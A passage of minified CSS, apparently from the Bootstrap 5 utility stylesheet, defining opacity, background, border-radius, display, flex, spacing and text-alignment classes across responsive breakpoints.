ext-white-50{--bs-text-opacity:1;color:rgba(255,255,255,.5)!important}.text-reset{--bs-text-opacity:1;color:inherit!important}.text-opacity-25{--bs-text-opacity:0.25}.text-opacity-50{--bs-text-opacity:0.5}.text-opacity-75{--bs-text-opacity:0.75}.text-opacity-100{--bs-text-opacity:1}.bg-primary{--bs-bg-opacity:1;background-color:rgba(var(--bs-primary-rgb),var(--bs-bg-opacity))!important}.bg-secondary{--bs-bg-opacity:1;background-color:rgba(var(--bs-secondary-rgb),var(--bs-bg-opacity))!important}.bg-success{--bs-bg-opacity:1;background-color:rgba(var(--bs-success-rgb),var(--bs-bg-opacity))!important}.bg-info{--bs-bg-opacity:1;background-color:rgba(var(--bs-info-rgb),var(--bs-bg-opacity))!important}.bg-warning{--bs-bg-opacity:1;background-color:rgba(var(--bs-warning-rgb),var(--bs-bg-opacity))!important}.bg-danger{--bs-bg-opacity:1;background-color:rgba(var(--bs-danger-rgb),var(--bs-bg-opacity))!important}.bg-light{--bs-bg-opacity:1;background-color:rgba(var(--bs-light-rgb),var(--bs-bg-opacity))!important}.bg-dark{--bs-bg-opacity:1;background-color:rgba(var(--bs-dark-rgb),var(--bs-bg-opacity))!important}.bg-black{--bs-bg-opacity:1;background-color:rgba(var(--bs-black-rgb),var(--bs-bg-opacity))!important}.bg-white{--bs-bg-opacity:1;background-color:rgba(var(--bs-white-rgb),var(--bs-bg-opacity))!important}.bg-body{--bs-bg-opacity:1;background-color:rgba(var(--bs-body-bg-rgb),var(--bs-bg-opacity))!important}.bg-transparent{--bs-bg-opacity:1;background-color:transparent!important}.bg-opacity-10{--bs-bg-opacity:0.1}.bg-opacity-25{--bs-bg-opacity:0.25}.bg-opacity-50{--bs-bg-opacity:0.5}.bg-opacity-75{--bs-bg-opacity:0.75}.bg-opacity-100{--bs-bg-opacity:1}.bg-gradient{background-image:var(--bs-gradient)!important}.user-select-all{-webkit-user-select:all!important;-moz-user-select:all!important;user-select:all!important}.user-select-auto{-webkit-user-select:auto!important;-moz-user-select:auto!important;user-select:auto!important}.user-select-none{-webkit-user-select:none!important;-moz-user-select:none!important;user-select:none!important}.pe-none{pointer-events:none!important}.pe-auto{pointer-events:auto!important}.rounded{border-radius:var(--bs-border-radius)!important}.rounded-0{border-radius:0!important}.rounded-1{border-radius:var(--bs-border-radius-sm)!important}.rounded-2{border-radius:var(--bs-border-radius)!important}.rounded-3{border-radius:var(--bs-border-radius-lg)!important}.rounded-4{border-radius:var(--bs-border-radius-xl)!important}.rounded-5{border-radius:var(--bs-border-radius-2xl)!important}.rounded-circle{border-radius:50%!important}.rounded-pill{border-radius:var(--bs-border-radius-pill)!important}.rounded-top{border-top-left-radius:var(--bs-border-radius)!important;border-top-right-radius:var(--bs-border-radius)!important}.rounded-end{border-top-right-radius:var(--bs-border-radius)!important;border-bottom-right-radius:var(--bs-border-radius)!important}.rounded-bottom{border-bottom-right-radius:var(--bs-border-radius)!important;border-bottom-left-radius:var(--bs-border-radius)!important}.rounded-start{border-bottom-left-radius:var(--bs-border-radius)!important;border-top-left-radius:var(--bs-border-radius)!important}.visible{visibility:visible!important}.invisible{visibility:hidden!important}@media (min-width:576px){.float-sm-start{float:left!important}.float-sm-end{float:right!important}.float-sm-none{float:none!important}.d-sm-inline{display:inline!important}.d-sm-inline-block{display:inline-block!important}.d-sm-block{display:block!important}.d-sm-grid{display:grid!important}.d-sm-table{display:table!important}.d-sm-table-row{display:table-row!important}.d-sm-table-cell{display:table-cell!important}.d-sm-flex{display:flex!important}.d-sm-inline-flex{display:inline-flex!important}.d-sm-none{display:none!important}.flex-sm-fill{flex:1 1 auto!important}.flex-sm-row{flex-direction:row!important}.flex-sm-column{flex-direction:column!important}.flex-sm-row-reverse{flex-direction:row-reverse!important}.flex-sm-column-reverse{flex-direction:column-reverse!important}.flex-sm-grow-0{flex-grow:0!important}.flex-sm-grow-1{flex-grow:1!important}.flex-sm-shrink-0{flex-shrink:0!important}.flex-sm-shrink-1{flex-shrink:1!important}.flex-sm-wrap{flex-wrap:wrap!important}.flex-sm-nowrap{flex-wrap:nowrap!important}.flex-sm-wrap-reverse{flex-wrap:wrap-reverse!important}.justify-content-sm-start{justify-content:flex-start!important}.justify-content-sm-end{justify-content:flex-end!important}.justify-content-sm-center{justify-content:center!important}.justify-content-sm-between{justify-content:space-between!important}.justify-content-sm-around{justify-content:space-around!important}.justify-content-sm-evenly{justify-content:space-evenly!important}.align-items-sm-start{align-items:flex-start!important}.align-items-sm-end{align-items:flex-end!important}.align-items-sm-center{align-items:center!important}.align-items-sm-baseline{align-items:baseline!important}.align-items-sm-stretch{align-items:stretch!important}.align-content-sm-start{align-content:flex-start!important}.align-content-sm-end{align-content:flex-end!important}.align-content-sm-center{align-content:center!important}.align-content-sm-between{align-content:space-between!important}.align-content-sm-around{align-content:space-around!important}.align-content-sm-stretch{align-content:stretch!important}.align-self-sm-auto{align-self:auto!important}.align-self-sm-start{align-self:flex-start!important}.align-self-sm-end{align-self:flex-end!important}.align-self-sm-center{align-self:center!important}.align-self-sm-baseline{align-self:baseline!important}.align-self-sm-stretch{align-self:stretch!important}.order-sm-first{order:-1!important}.order-sm-0{order:0!important}.order-sm-1{order:1!important}.order-sm-2{order:2!important}.order-sm-3{order:3!important}.order-sm-4{order:4!important}.order-sm-5{order:5!important}.order-sm-last{order:6!important}.m-sm-0{margin:0!important}.m-sm-1{margin:.25rem!important}.m-sm-2{margin:.5rem!important}.m-sm-3{margin:1rem!important}.m-sm-4{margin:1.5rem!important}.m-sm-5{margin:3rem!important}.m-sm-auto{margin:auto!important}.mx-sm-0{margin-right:0!important;margin-left:0!important}.mx-sm-1{margin-right:.25rem!important;margin-left:.25rem!important}.mx-sm-2{margin-right:.5rem!important;margin-left:.5rem!important}.mx-sm-3{margin-right:1rem!important;margin-left:1rem!important}.mx-sm-4{margin-right:1.5rem!important;margin-left:1.5rem!important}.mx-sm-5{margin-right:3rem!important;margin-left:3rem!important}.mx-sm-auto{margin-right:auto!important;margin-left:auto!important}.my-sm-0{margin-top:0!important;margin-bottom:0!important}.my-sm-1{margin-top:.25rem!important;margin-bottom:.25rem!important}.my-sm-2{margin-top:.5rem!important;margin-bottom:.5rem!important}.my-sm-3{margin-top:1rem!important;margin-bottom:1rem!important}.my-sm-4{margin-top:1.5rem!important;margin-bottom:1.5rem!important}.my-sm-5{margin-top:3rem!important;margin-bottom:3rem!important}.my-sm-auto{margin-top:auto!important;margin-bottom:auto!important}.mt-sm-0{margin-top:0!important}.mt-sm-1{margin-top:.25rem!important}.mt-sm-2{margin-top:.5rem!important}.mt-sm-3{margin-top:1rem!important}.mt-sm-4{margin-top:1.5rem!important}.mt-sm-5{margin-top:3rem!important}.mt-sm-auto{margin-top:auto!important}.me-sm-0{margin-right:0!important}.me-sm-1{margin-right:.25rem!important}.me-sm-2{margin-right:.5rem!important}.me-sm-3{margin-right:1rem!important}.me-sm-4{margin-right:1.5rem!important}.me-sm-5{margin-right:3rem!important}.me-sm-auto{margin-right:auto!important}.mb-sm-0{margin-bottom:0!important}.mb-sm-1{margin-bottom:.25rem!important}.mb-sm-2{margin-bottom:.5rem!important}.mb-sm-3{margin-bottom:1rem!important}.mb-sm-4{margin-bottom:1.5rem!important}.mb-sm-5{margin-bottom:3rem!important}.mb-sm-auto{margin-bottom:auto!important}.ms-sm-0{margin-left:0!important}.ms-sm-1{margin-left:.25rem!important}.ms-sm-2{margin-left:.5rem!important}.ms-sm-3{margin-left:1rem!important}.ms-sm-4{margin-left:1.5rem!important}.ms-sm-5{margin-left:3rem!important}.ms-sm-auto{margin-left:auto!important}.p-sm-0{padding:0!important}.p-sm-1{padding:.25rem!important}.p-sm-2{padding:.5rem!important}.p-sm-3{padding:1rem!important}.p-sm-4{padding:1.5rem!important}.p-sm-5{padding:3rem!important}.px-sm-0{padding-right:0!important;padding-left:0!important}.px-sm-1{padding-right:.25rem!important;padding-left:.25rem!important}.px-sm-2{padding-right:.5rem!important;padding-left:.5rem!important}.px-sm-3{padding-right:1rem!important;padding-left:1rem!important}.px-sm-4{padding-right:1.5rem!important;padding-left:1.5rem!important}.px-sm-5{padding-right:3rem!important;padding-left:3rem!important}.py-sm-0{padding-top:0!important;padding-bottom:0!important}.py-sm-1{padding-top:.25rem!important;padding-bottom:.25rem!important}.py-sm-2{padding-top:.5rem!important;padding-bottom:.5rem!important}.py-sm-3{padding-top:1rem!important;padding-bottom:1rem!important}.py-sm-4{padding-top:1.5rem!important;padding-bottom:1.5rem!important}.py-sm-5{padding-top:3rem!important;padding-bottom:3rem!important}.pt-sm-0{padding-top:0!important}.pt-sm-1{padding-top:.25rem!important}.pt-sm-2{padding-top:.5rem!important}.pt-sm-3{padding-top:1rem!important}.pt-sm-4{padding-top:1.5rem!important}.pt-sm-5{padding-top:3rem!important}.pe-sm-0{padding-right:0!important}.pe-sm-1{padding-right:.25rem!important}.pe-sm-2{padding-right:.5rem!important}.pe-sm-3{padding-right:1rem!important}.pe-sm-4{padding-right:1.5rem!important}.pe-sm-5{padding-right:3rem!important}.pb-sm-0{padding-bottom:0!important}.pb-sm-1{padding-bottom:.25rem!important}.pb-sm-2{padding-bottom:.5rem!important}.pb-sm-3{padding-bottom:1rem!important}.pb-sm-4{padding-bottom:1.5rem!important}.pb-sm-5{padding-bottom:3rem!important}.ps-sm-0{padding-left:0!important}.ps-sm-1{padding-left:.25rem!important}.ps-sm-2{padding-left:.5rem!important}.ps-sm-3{padding-left:1rem!important}.ps-sm-4{padding-left:1.5rem!important}.ps-sm-5{padding-left:3rem!important}.gap-sm-0{gap:0!important}.gap-sm-1{gap:.25rem!important}.gap-sm-2{gap:.5rem!important}.gap-sm-3{gap:1rem!important}.gap-sm-4{gap:1.5rem!important}.gap-sm-5{gap:3rem!important}.text-sm-start{text-align:left!important}.text-sm-end{text-align:right!important}.text-sm-center{text-align:center!important}}@media (min-width:768px){.float-md-start{float:left!important}.float-md-end{float:right!important}.float-md-none{float:none!important}.d-md-inline{display:inline!important}.d-md-inline-block{display:inline-block!important}.d-md-block{display:block!important}.d-md-grid{display:grid!important}.d-md-table{display:table!important}.d-md-table-row{display:table-row!important}.d-md-table-cell{display:table-cell!important}.d-md-flex{display:flex!important}.d-md-inline-flex{display:inline-flex!important}.d-md-none{display:none!important}.flex-md-fill{flex:1 1 auto!important}.flex-md-row{flex-direction:row!important}.flex-md-column{flex-direction:column!important}.flex-md-row-reverse{flex-direction:row-reverse!important}.flex-md-column-reverse{flex-direction:column-reverse!important}.flex-md-grow-0{flex-grow:0!important}.flex-md-grow-1{flex-grow:1!important}.flex-md-shrink-0{flex-shrink:0!important}.flex-md-shrink-1{flex-shrink:1!important}.flex-md-wrap{flex-wrap:wrap!important}.flex-md-nowrap{flex-wrap:nowrap!important}.flex-md-wrap-reverse{flex-wrap:wrap-reverse!important}.justify-content-md-start{justify-content:flex-start!important}.justify-content-md-end{justify-content:flex-end!important}.justify-content-md-center{justify-content:center!important}.justify-content-md-between{justify-content:space-between!important}.justify-content-md-around{justify-content:space-around!important}.justify-content-md-evenly{justify-content:space-evenly!important}.align-items-md-start{align-items:flex-start!important}.align-items-md-end{align-items:flex-end!important}.align-items-md-center{align-items:center!important}.align-items-md-baseline{align-items:baseline!important}.align-items-md-stretch{align-items:stretch!important}.align-content-md-start{align-content:flex-start!important}.align-content-md-end{align-content:flex-end!important}.align-content-md-center{align-content:center!important}.align-content-md-between{align-content:space-between!important}.align-content-md-around{align-content:space-around!important}.align-content-md-stretch{align-content:stretch!important}.align-self-md-auto{align-self:auto!important}.align-self-md-start{align-self:flex-start!important}.align-self-md-end{align-self:flex-end!important}.align-self-md-center{align-self:center!important}.align-self-md-baseline{align-self:baseline!important}.align-self-md-stretch{align-self:stretch!important}.order-md-first{order:-1!important}.order-md-0{order:0!important}.order-md-1{order:1!important}.order-md-2{order:2!important}.order-md-3{order:3!important}.order-md-4{order:4!important}.order-md-5{order:5!important}.order-md-last{order:6!important}.m-md-0{margin:0!important}.m-md-1{margin:.25rem!important}.m-md-2{margin:.5rem!important}.m-md-3{margin:1rem!important}.m-md-4{margin:1.5rem!important}.m-md-5{margin:3rem!important}.m-md-auto{margin:auto!important}.mx-md-0{margin-right:0!important;margin-left:0!important}.mx-md-1{margin-right:.25rem!important;margin-left:.25rem!important}.mx-md-2{margin-right:.5rem!important;margin-left:.5rem!important}.mx-md-3{margin-right:1rem!important;margin-left:1rem!important}.mx-md-4{margin-right:1.5rem!important;margin-left:1.5rem!important}.mx-md-5{margin-right:3rem!important;margin-left:3rem!important}.mx-md-auto{margin-right:auto!important;margin-left:auto!important}.my-md-0{margin-top:0!important;margin-bottom:0!important}.my-md-1{margin-top:.25rem!important;margin-bottom:.25rem!important}.my-md-2{margin-top:.5rem!important;margin-bottom:.5rem!important}.my-md-3{margin-top:1rem!important;margin-bottom:1rem!important}.my-md-4{margin-top:1.5rem!important;margin-bottom:1.5rem!important}.my-md-5{margin-top:3rem!important;margin-bottom:3rem!important}.my-md-auto{margin-top:auto!important;margin-bottom:auto!important}.mt-md-0{margin-top:0!important}.mt-md-1{margin-top:.25rem!important}.mt-md-2{margin-top:.5rem!important}.mt-md-3{margin-top:1rem!important}.mt-md-4{margin-top:1.5rem!important}.mt-md-5{margin-top:3rem!important}.mt-md-auto{margin-top:auto!important}.me-md-0{margin-right:0!important}.me-md-1{margin-right:.25rem!important}.me-md-2{margin-right:.5rem!important}.me-md-3{margin-right:1rem!important}.me-md-4{margin-right:1.5rem!important}.me-md-5{margin-right:3rem!important}.me-md-auto{margin-right:auto!important}.mb-md-0{margin-bottom:0!important}.mb-md-1{margin-bottom:.25rem!important}.mb-md-2{margin-bottom:.5rem!important}.mb-md-3{margin-bottom:1rem!important}.mb-md-4{margin-bottom:1.5rem!important}.mb-md-5{margin-bottom:3rem!important}.mb-md-auto{margin-bottom:auto!important}.ms-md-0{margin-left:0!important}.ms-md-1{margin-left:.25rem!important}.ms-md-2{margin-left:.5rem!important}.ms-md-3{margin-left:1rem!important}.ms-md-4{margin-left:1.5rem!important}.ms-md-5{margin-left:3rem!important}.ms-md-auto{margin-left:auto!important}.p-md-0{padding:0!important}.p-md-1{padding:.25rem!important}.p-md-2{padding:.5rem!important}.p-md-3{padding:1rem!important}.p-md-4{padding:1.5rem!important}.p-md-5{padding:3rem!important}.px-md-0{padding-right:0!important;padding-left:0!important}.px-md-1{padding-right:.25rem!important;padding-left:.25rem!important}.px-md-2{padding-right:.5rem!important;padding-left:.5rem!important}.px-md-3{padding-right:1rem!important;padding-left:1rem!important}.px-md-4{padding-right:1.5rem!important;padding-left:1.5rem!important}.px-md-5{padding-right:3rem!important;padding-left:3rem!important}.py-md-0{padding-top:0!important;padding-bottom:0!important}.py-md-1{padding-top:.25rem!important;padding-bottom:.25rem!important}.py-md-2{padding-top:.5rem!important;padding-bottom:.5rem!important}.py-md-3{padding-top:1rem!important;padding-bottom:1rem!important}.py-md-4{padding-top:1.5rem!important;padding-bottom:1.5rem!important}.py-md-5{padding-top:3rem!important;padding-bottom:3rem!important}.pt-md-0{padding-top:0!important}.pt-md-1{padding-top:.25rem!important}.pt-md-2{padding-top:.5rem!important}.pt-md-3{padding-top:1rem!important}.pt-md-4{padding-top:1.5rem!important}.pt-md-5{padding-top:3rem!important}.pe-md-0{padding-right:0!important}.pe-md-1{padding-right:.25rem!important}.pe-md-2{padding-right:.5rem!important}.pe-md-3{padding-right:1rem!important}.pe-md-4{padding-right:1.5rem!important}.pe-md-5{padding-right:3rem!important}.pb-md-0{padding-bottom:0!important}.pb-md-1{padding-bottom:.25rem!important}.pb-md-2{padding-bottom:.5rem!important}.pb-md-3{padding-bottom:1rem!important}.pb-md-4{padding-bottom:1.5rem!important}.pb-md-5{padding-bottom:3rem!important}.ps-md-0{padding-left:0!important}.ps-md-1{padding-left:.25rem!important}.ps-md-2{padding-left:.5rem!important}.ps-md-3{padding-left:1rem!important}.ps-md-4{padding-left:1.5rem!important}.ps-md-5{padding-left:3rem!important}.gap-md-0{gap:0!important}.gap-md-1{gap:.25rem!important}.gap-md-2{gap:.5rem!important}.gap-md-3{gap:1rem!important}.gap-md-4{gap:1.5rem!important}.gap-md-5{gap:3rem!important}.text-md-start{text-align:left!important}.text-md-end{text-align:right!important}.text-md-center{text-align:center!important}}@media (min-width:992px){.float-lg-start{float:left!important}.float-lg-end{float:right!important}.float-lg-none{float:none!important}.d-lg-inline{display:inline!important}.d-lg-inline-block{display:inline-block!important}.d-lg-block{display:block!important}.d-lg-grid{display:grid!important}.d-lg-table{display:table!important}.d-lg-table-row{display:table-row!important}.d-lg-table-cell{display:table-cell!important}.d-lg-flex{display:flex!important}.d-lg-inline-flex{display:inline-flex!important}.d-lg-none{display:none!important}.flex-lg-fill{flex:1 1 auto!important}.flex-lg-row{flex-direction:row!important}.flex-lg-column{flex-direction:column!important}.flex-lg-row-reverse{flex-direction:row-reverse!important}.flex-lg-column-reverse{flex-direction:column-reverse!important}.flex-lg-grow-0{flex-grow:0!important}.flex-lg-grow-1{flex-grow:1!important}.flex-lg-shrink-0{flex-shrink:0!important}.flex-lg-shrink-1{flex-shrink:1!important}.flex-lg-wrap{flex-wrap:wrap!important}.flex-lg-nowrap{flex-wrap:nowrap!important}.flex-lg-wrap-reverse{flex-wrap:wrap-reverse!important}.justify-content-lg-start{justify-content:flex-start!important}.justify-content-lg-end{justify-content:flex-end!important}.justify-content-lg-center{justify-content:center!important}.justify-content-lg-between{justify-content:space-between!important}.justify-content-lg-around{justify-content:space-around!important}.justify-content-lg-evenly{justify-content:space-evenly!important}.align-items-lg-start{align-items:flex-start!important}.align-items-lg-end{align-items:flex-end!important}.align-items-lg-center{align-items:center!important}.align-items-lg-baseline{align-items:baseline!important}.align-items-lg-stretch{align-items:stretch!important}.align-content-lg-start{align-content:flex-start!important}.align-content-lg-end{align-content:flex-end!important}.align-content-lg-center{align-content:center!important}.align-content-lg-between{align-content:space-between!important}.align-content-lg-around{align-content:space-around!important}.align-content-lg-stretch{align-content:stretch!important}.align-self-lg-auto{align-self:auto!important}.align-self-lg-start{align-self:flex-start!important}.align-self-lg-end{align-self:flex-end!important}.align-self-lg-center{align-self:center!important}.align-self-lg-baseline{align-self:baseline!important}.align-self-lg-stretch{align-self:stretch!important}.order-lg-first{order:-1!important}.order-lg-0{order:0!important}.order-lg-1{order:1!important}.order-lg-2{order:2!important}.order-lg-3{order:3!important}.order-lg-4{order:4!important}.order-lg-5{order:5!important}.order-lg-last{order:6!important}.m-lg-0{margin:0!important}.m-lg-1{margin:.25rem!important}.m-lg-2{margin:.5rem!important}.m-lg-3{margin:1rem!important}.m-lg-4{margin:1.5rem!important}.m-lg-5{margin:3rem!important}.m-lg-auto{margin:auto!important}.mx-lg-0{margin-right:0!important;margin-left:0!important}.mx-lg-1{margin-right:.25rem!important;margin-left:.25rem!important}.mx-lg-2{margin-right:.5rem!important;margin-left:.5rem!important}.mx-lg-3{margin-right:1rem!important;margin-left:1rem!important}.mx-lg-4{margin-right:1.5rem!important;margin-left:1.5rem!important}.mx-lg-5{margin-right:3rem!important;margin-left:3rem!important}.mx-lg-auto{margin-right:auto!important;margin-left:auto!important}.my-lg-0{margin-top:0!important;margin-bottom:0!important}.my-lg-1{margin-top:.25rem!important;margin-bottom:.25rem!important}.my-lg-2{margin-top:.5rem!important;margin-bottom:.5rem!important}.my-lg-3{margin-top:1rem!important;margin-bottom:1rem!important}.my-lg-4{margin-top:1.5rem!important;margin-bottom:1.5rem!important}.my-lg-5{margin-top:3rem!important;margin-bottom:3rem!important}.my-lg-auto{margin-top:auto!important;margin-bottom:auto!important}.mt-lg-0{margin-top:0!important}.mt-lg-1{margin-top:.25rem!important}.mt-lg-2{margin-top:.5rem!important}.mt-lg-3{margin-top:1rem!important}.mt-lg-4{margin-top:1.5rem!important}.mt-lg-5{margin-top:3rem!important}.mt-lg-auto{margin-top:auto!important}.me-lg-0{margin-right:0!important}.me-lg-1{margin-right:.25rem!important}.me-lg-2{margin-right:.5rem!important}.me-lg-3{margin-right:1rem!important}.me-lg-4{margin-right:1.5rem!important}.me-lg-5{margin-right:3rem!important}.me-lg-auto{margin-right:auto!important}.mb-lg-0{margin-bottom:0!important}.mb-lg-1{margin-bottom:.25rem!important}.mb-lg-2{margin-bottom:.5rem!important}.mb-lg-3{margin-bottom:1rem!important}.mb-lg-4{margin-bottom:1.5rem!important}.mb-lg-5{margin-bottom:3rem!important}.mb-lg-auto{margin-bottom:auto!important}.ms-lg-0{margin-left:0!important}.ms-lg-1{margin-left:.25rem!important}.ms-lg-2{margin-left:.5rem!important}.ms-lg-3{margin-left:1rem!important}.ms-lg-4{margin-left:1.5rem!important}.ms-lg-5{margin-left:3rem!important}.ms-lg-auto{margin-left:auto!important}.p-lg-0{padding:0!important}.p-lg-1{padding:.25rem!important}.p-lg-2{padding:.5rem!important}.p-lg-3{padding:1rem!important}.p-lg-4{padding:1.5rem!important}.p-lg-5{padding:3rem!important}.px-lg-0{padding-right:0!important;padding-left:0!important}.px-lg-1{padding-right:.25rem!important;padding-left:.25rem!important}.px-lg-2{padding-right:.5rem!important;padding-left:.5rem!important}.px-lg-3{padding-right:1rem!important;padding-left:1rem!important}.px-lg-4{padding-right:1.5rem!important;padding-left:1.5rem!important}.px-lg-5{padding-right:3rem!important;padding-left:3rem!important}.py-lg-0{padding-top:0!important;padding-bottom:0!important}.py-lg-1{padding-top:.25rem!important;padding-bottom:.25rem!important}.py-lg-2{padding-top:.5rem!important;padding-bottom:.5rem!important}.py-lg-3{padding-top:1rem!important;padding-bottom:1rem!important}.py-lg-4{padding-top:1.5rem!important;padding-bottom:1.5rem!important}.py-lg-5{padding-top:3rem!important;padding-bottom:3rem!important}.pt-lg-0{padding-top:0!important}.pt-lg-1{padding-top:.25rem!important}.pt-lg-2{padding-top:.5rem!important}.pt-lg-3{padding-top:1rem!important}.pt-lg-4{padding-top:1.5rem!important}.pt-lg-5{padding-top:3rem!important}.pe-lg-0{padding-right:0!important}.pe-lg-1{padding-right:.25rem!important}.pe-lg-2{padding-right:.5rem!important}.pe-lg-3{padding-right:1rem!important}.pe-lg-4{padding-right:1.5rem!important}.pe-lg-5{padding-right:3rem!important}.pb-lg-0{padding-bottom:0!important}.pb-lg-1{padding-bottom:.25rem!important}.pb-lg-2{padding-bottom:.5rem!important}.pb-lg-3{padding-bottom:1rem!important}.pb-lg-4{padding-bottom:1.5rem!important}.pb-lg-5{padding-bottom:3rem!important}.ps-lg-0{padding-left:0!important}.ps-lg-1{padding-left:.25rem!important}.ps-lg-2{padding-left:.5rem!important}.ps-lg-3{padding-left:1rem!important}.ps-lg-4{padding-left:1.5rem!important}.ps-lg-5{padding-left:3rem!important}.gap-lg-0{gap:0!important}.gap-lg-1{gap:.25rem!important}.gap-lg-2{gap:.5rem!important}.gap-lg-3{gap:1rem!important}.gap-lg-4{gap:1.5rem!important}.gap-lg-5{gap:3rem!important}.text-lg-start{text-align:left!important}.text-lg-end{text-align:right!important}.text-lg-center{text-align:center!important}}@media (min-width:1200px){.float-xl-start{float:left!important}.float-xl-end{float:right!important}.float-xl-none{float:none!important}.d-xl-inline{display:inline!important}.d-xl-inline-block{display:inline-block!important}.d-xl-block{display:block!important}.d-xl-grid{display:grid!important}.d-xl-table{display:table!important}.d-xl-table-row{display:table-row!important}.d-xl-table-cell{display:table-cell!important}.d-xl-flex{display:flex!important}.d-xl-inline-flex{display:inline-flex!important}.d-xl-none{display:none!important}.flex-xl-fill{flex:1 1 auto!important}.flex-xl-row{flex-direction:row!important}.flex-xl-column{flex-direction:column!important}.flex-xl-row-reverse{flex-direction:row-reverse!important}.flex-xl-column-reverse{flex-direction:column-reverse!important}.flex-xl-grow-0{flex-grow:0!important}.flex-xl-grow-1{flex-grow:1!important}.flex-xl-shrink-0{flex-shrink:0!important}.flex-xl-shrink-1{flex-shrink:1!important}.flex-xl-wrap{flex-wrap:wrap!important}.flex-xl-nowrap{flex-wrap:nowrap!important}.flex-xl-wrap-reverse{flex-wrap:wrap-reverse!important}.justify-content-xl-start{justify-content:flex-start!important}.justify-content-xl-end{justify-content:flex-end!important}.justify-content-xl-center{justify-content:center!important}.justify-content-xl-between{justify-content:space-between!important}.justify-content-xl-around{justify-content:space-around!important}.justify-content-xl-evenly{justify-content:space-evenly!important}.align-items-xl-start{align-items:flex-start!important}.align-items-xl-end{align-items:flex-end!important}.align-items-xl-center{align-items:center!important}.align-items-xl-baseline{align-items:baseline!important}.align-items-xl-stretch{align-items:stretch!important}.align-content-xl-start{align-content:flex-start!important}.align-content-xl-end{align-content:flex-end!important}.align-content-xl-center{align-content:center!important}.align-content-xl-between{align-content:space-between!important}.align-content-xl-around{align-content:space-around!important}.align-content-xl-stretch{align-content:stretch!important}.align-self-xl-auto{align-self:auto!important}.align-self-xl-start{align-self:flex-start!important}.align-self-xl-end{align-self:flex-end!important}.align-self-xl-center{align-self:center!important}.align-self-xl-baseline{align-self:baseline!important}.align-self-xl-stretch{align-self:stretch!important}.order-xl-first{order:-1!important}.order-xl-0{order:0!important}.order-xl-1{order:1!important}.order-xl-2{order:2!important}.order-xl-3{order:3!important}.order-xl-4{order:4!important}.order-xl-5{order:5!important}.order-xl-last{order:6!important}.m-xl-0{margin:0!important}.m-xl-1{margin:.25rem!important}.m-xl-2{margin:.5rem!important}.m-xl-3{margin:1rem!important}.m-xl-4{margin:1.5rem!important}.m-xl-5{margin:3rem!important}.m-xl-auto{margin:auto!important}.mx-xl-0{margin-right:0!important;margin-left:0!important}.mx-xl-1{margin-right:.25rem!important;margin-left:.25rem!important}.mx-xl-2{margin-right:.5rem!important;margin-left:.5rem!important}.mx-xl-3{margin-right:1rem!important;margin-left:1rem!important}.mx-xl-4{margin-right:1.5rem!important;margin-left:1.5rem!important}.mx-xl-5{margin-right:3rem!important;margin-left:3rem!important}.mx-xl-auto{margin-right:auto!important;margin-left:auto!important}.my-xl-0{margin-top:0!important;margin-bottom:0!important}.my-xl-1{margin-top:.25rem!important;margin-bottom:.25rem!important}.my-xl-2{margin-top:.5rem!important;margin-bottom:.5rem!important}.my-xl-3{margin-top:1rem!important;margin-bottom:1rem!important}.my-xl-4{margin-top:1.5rem!important;margin-bottom:1.5rem!important}.my-xl-5{margin-top:3rem!important;margin-bottom:3rem!important}.my-xl-auto{margin-top:auto!important;margin-bottom:auto!important}.mt-xl-0{margin-top:0!important}.mt-xl-1{margin-top:.25rem!important}.mt-xl-2{margin-top:.5rem!important}.mt-xl-3{margin-top:1rem!important}.mt-xl-4{margin-top:1.5rem!important}.mt-xl-5{margin-top:3rem!important}.mt-xl-auto{margin-top:auto!important}.me-xl-0{margin-right:0!important}.me-xl-1{margin-right:.25rem!important}.me-xl-2{margin-right:.5rem!important}.me-xl-3{margin-right:1rem!important}.me-xl-4{margin-right:1.5rem!important}.me-xl-5{margin-right:3rem!important}.me-xl-auto{margin-right:auto!important}.mb-xl-0{margin-bottom:0!important}.mb-xl-1{margin-bottom:.25rem!important}.mb-xl-2{margin-bottom:.5rem!important}.mb-xl-3{margin-bottom:1rem!important}.mb-xl-4{margin-bottom:1.5rem!important}.mb-xl-5{margin-bottom:3rem!important}.mb-xl-auto{margin-bottom:auto!important}.ms-xl-0{margin-left:0!important}.ms-xl-1{margin-left:.25rem!important}.ms-xl-2{margin-left:.5rem!important}.ms-xl-3{margin-left:1rem!important}.ms-xl-4{margin-left:1.5rem!important}.ms-xl-5{margin-left:3rem!important}.ms-xl-auto{margin-left:auto!important}.p-xl-0{padding:0!important}.p-xl-1{padding:.25rem!important}.p-xl-2{padding:.5rem!important}.p-xl-3{padding:1rem!important}.p-xl-4{padding:1.5rem!important}.p-xl-5{padding:3rem!important}.px-xl-0{padding-right:0!important;padding-left:0!important}.px-xl-1{padding-right:.25rem!important;padding-left:.25rem!important}.px-xl-2{padding-right:.5rem!important;padding-left:.5rem!important}.px-xl-3{padding-right:1rem!important;padding-left:1rem!important}.px-xl-4{padding-right:1.5rem!important;padding-left:1.5rem!important}.px-xl-5{padding-right:3rem!important;padding-left:3rem!important}.py-xl-0{padding-top:0!important;padding-bottom:0!important}.py-xl-1{padding-top:.25rem!important;padding-bottom:.25rem!important}.py-xl-2{padding-top:.5rem!important;padding-bottom:.5rem!important}.py-xl-3{padding-top:1rem!important;padding-bottom:1rem!important}.py-xl-4{padding-top:1.5rem!important;padding-bottom:1.5rem!important}.py-xl-5{padding-top:3rem!important;padding-bottom:3rem!important}.pt-xl-0{padding-top:0!important}.pt-xl-1{padding-top:.25rem!important}.pt-xl-2{padding-top:.5rem!important}.pt-xl-3{padding-top:1rem!important}.pt-xl-4{padding-top:1.5rem!important}.pt-xl-5{padding-top:3rem!important}.pe-xl-0{padding-right:0!important}.pe-xl-1{padding-right:.25rem!important}.pe-xl-2{padding-right:.5rem!important}.pe-xl-3{padding-right:1rem!important}.pe-xl-4{padding-right:1.5rem!important}.pe-xl-5{padding-right:3rem!important}.pb-xl-0{padding-bottom:0!important}.pb-xl-1{padding-bottom:.25rem!important}.pb-xl-2{padding-bottom:.5rem!important}.pb-xl-3{padding-bottom:1rem!important}.pb-xl-4{padding-bottom:1.5rem!important}.pb-xl-5{padding-bottom:3rem!important}.ps-xl-0{padding-left:0!important}.ps-xl-1{padding-left:.25rem!important}.ps-xl-2{padding-left:.5rem!important}.ps-xl-3{padding-left:1rem!important}.ps-xl-4{padding-left:1.5rem!important}.ps-xl-5{padding-left:3rem!important}.gap-xl-0{gap:0!important}.gap-xl-1{gap:.25rem!important}.gap-xl-2{gap:.5rem!important}.gap-xl-3{gap:1rem!important}.gap-xl-4{gap:1.5rem!important}.gap-xl-5{gap:3rem!important}.text-xl-start{text-align:left!important}.text-xl-end{text-align:right!important}.